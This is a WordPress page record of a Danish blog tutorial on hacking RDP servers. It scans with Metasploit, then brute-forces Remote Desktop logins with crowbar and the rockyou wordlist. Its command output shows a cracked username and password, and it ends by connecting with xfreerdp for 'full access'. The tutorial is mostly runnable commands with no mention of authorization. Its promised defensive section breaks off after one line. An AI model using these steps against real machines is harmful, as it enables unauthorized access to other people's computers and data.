{"id":23059,"date":"2021-02-11T16:14:59","date_gmt":"2021-02-11T15:14:59","guid":{"rendered":"https:\/\/www.linuxboxen.dk\/?page_id=23059"},"modified":"2021-02-11T16:14:59","modified_gmt":"2021-02-11T15:14:59","slug":"hacking-paa-rdp-server","status":"publish","type":"page","link":"https:\/\/www.linuxboxen.dk\/?page_id=23059","title":{"rendered":"Hacking p\u00e5 rdp server."},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-23049 alignnone\" src=\"https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/02\/metasexploit.png\" alt=\"\" width=\"490\" height=\"335\" \/><\/p>\n<p>Hacking rdp er blevet meget nemt.<\/p>\n<p>Du skal bruge en kali samt lidt tools.<\/p>\n<p>&nbsp;<\/p>\n<p>msf6 &gt; show options<\/p>\n<p>msf6 &gt; Set RHOST 192.168.0.23<\/p>\n<p>RHOST =&gt; 192.168.0.23<\/p>\n<p>exploit<\/p>\n<p>Du kan nu se listen over hvilken ip som er \u00e5ben for rdp.<\/p>\n<p>exit<\/p>\n<p>Du skal ogs\u00e5 bruge crowbar fra github.<\/p>\n<p>cd git<\/p>\n<p>git clone https:\/\/github.com\/galkan\/crowbar<\/p>\n<p>cd crowbar<\/p>\n<p>.\/crowbar.py -h<\/p>\n<p>Som jeg viser her bruger vi 192.168.0.23 som attack ip. Protocol er rdp (remote desktop). Bruger navn er brugernavn og den sidste parametre er til password filen som skal bruges. Du vil nu f\u00e5 en liste over hvilken maskiner som det er muligt at tilg\u00e5, og du kan til g\u00e5 den med xfreerdp eksempelvis hvis du er p\u00e5 en Linux maskine.<\/p>\n<pre>$ .\/crowbar.py --server 192.168.0.23\/32\u00a0 -b rdp -u brugernavn -C \/usr\/share\/wordlists\/rockyou.txt\n2021-02-10 23:34:50 START\n2021-02-10 23:34:50 Crowbar v0.4.3-dev\n2021-02-10 23:34:52 Trying 192.168.0.23:3389\n2021-02-10 23:34:54 RDP-SUCCESS : 192.168.0.23:3389 - brugernavn:mitkodeord<\/pre>\n<p>Hvis du manger password filen kan du installere den som vist her.<\/p>\n<pre>$ sudo apt-get install wordlists<\/pre>\n<p>&nbsp;<\/p>\n<p>For at lave remove desktop til maskinen kan du bruge xfreerdp. Den installeres ogs\u00e5 nemt med en apt install.<\/p>\n<pre>$ sudo apt install xfreerdp<\/pre>\n<p>For at starte remove desktop op skal du bruge de parametre som du fik at skanningen.<\/p>\n<pre>$ sudo xfreerdp \/u:brugernavn \/p:mitkodeord \/v:192.168.0.23<\/pre>\n<p>Hvis den ikke er installeret kan du nemt installere den med apt som vist her.<\/p>\n<pre>$ sudo apt install freerdp2-x11\n\n$ sudo xfreerdp \/u:brugernavn \/p:mitkodeord \/v:192.168.0.23<\/pre>\n<p>Du har nu fuld adgang med remote desktop til maskinen.<\/p>\n<p>&nbsp;<\/p>\n<p>For at stoppe den slags attack kan du g\u00f8re f\u00f8lgende i Windows.<\/p>\n<p>Start programmet Local Security Policy<\/p>\n<pre class=\"notranslate\"><\/pre>\n<p>&nbsp;<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p id=\"pvc_stats_23059\" class=\"pvc_stats all  \" data-element-id=\"23059\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> <img loading=\"lazy\" decoding=\"async\" width=\"16\" height=\"16\" alt=\"Loading\" src=\"https:\/\/www.linuxboxen.dk\/wp-content\/plugins\/page-views-count\/ajax-loader-2x.gif\" border=0 \/><\/p>\n<div class=\"pvc_clear\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Hacking rdp er blevet meget nemt. Du skal bruge en kali samt lidt tools. &nbsp; msf6 &gt; show options msf6 &gt; Set RHOST 192.168.0.23 RHOST =&gt; 192.168.0.23 exploit Du kan nu se listen over hvilken ip som er \u00e5ben for rdp. exit Du skal ogs\u00e5 bruge crowbar fra github. cd git git clone https:\/\/github.com\/galkan\/crowbar cd [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p id=\"pvc_stats_23059\" class=\"pvc_stats all  \" data-element-id=\"23059\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> <img loading=\"lazy\" decoding=\"async\" width=\"16\" height=\"16\" alt=\"Loading\" src=\"https:\/\/www.linuxboxen.dk\/wp-content\/plugins\/page-views-count\/ajax-loader-2x.gif\" border=0 \/><\/p>\n<div class=\"pvc_clear\"><\/div>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"class_list":["post-23059","page","type-page","status-publish","hentry"],"a3_pvc":{"activated":true,"total_views":37,"today_views":0},"_links":{"self":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages\/23059","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23059"}],"version-history":[{"count":0,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages\/23059\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23059"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}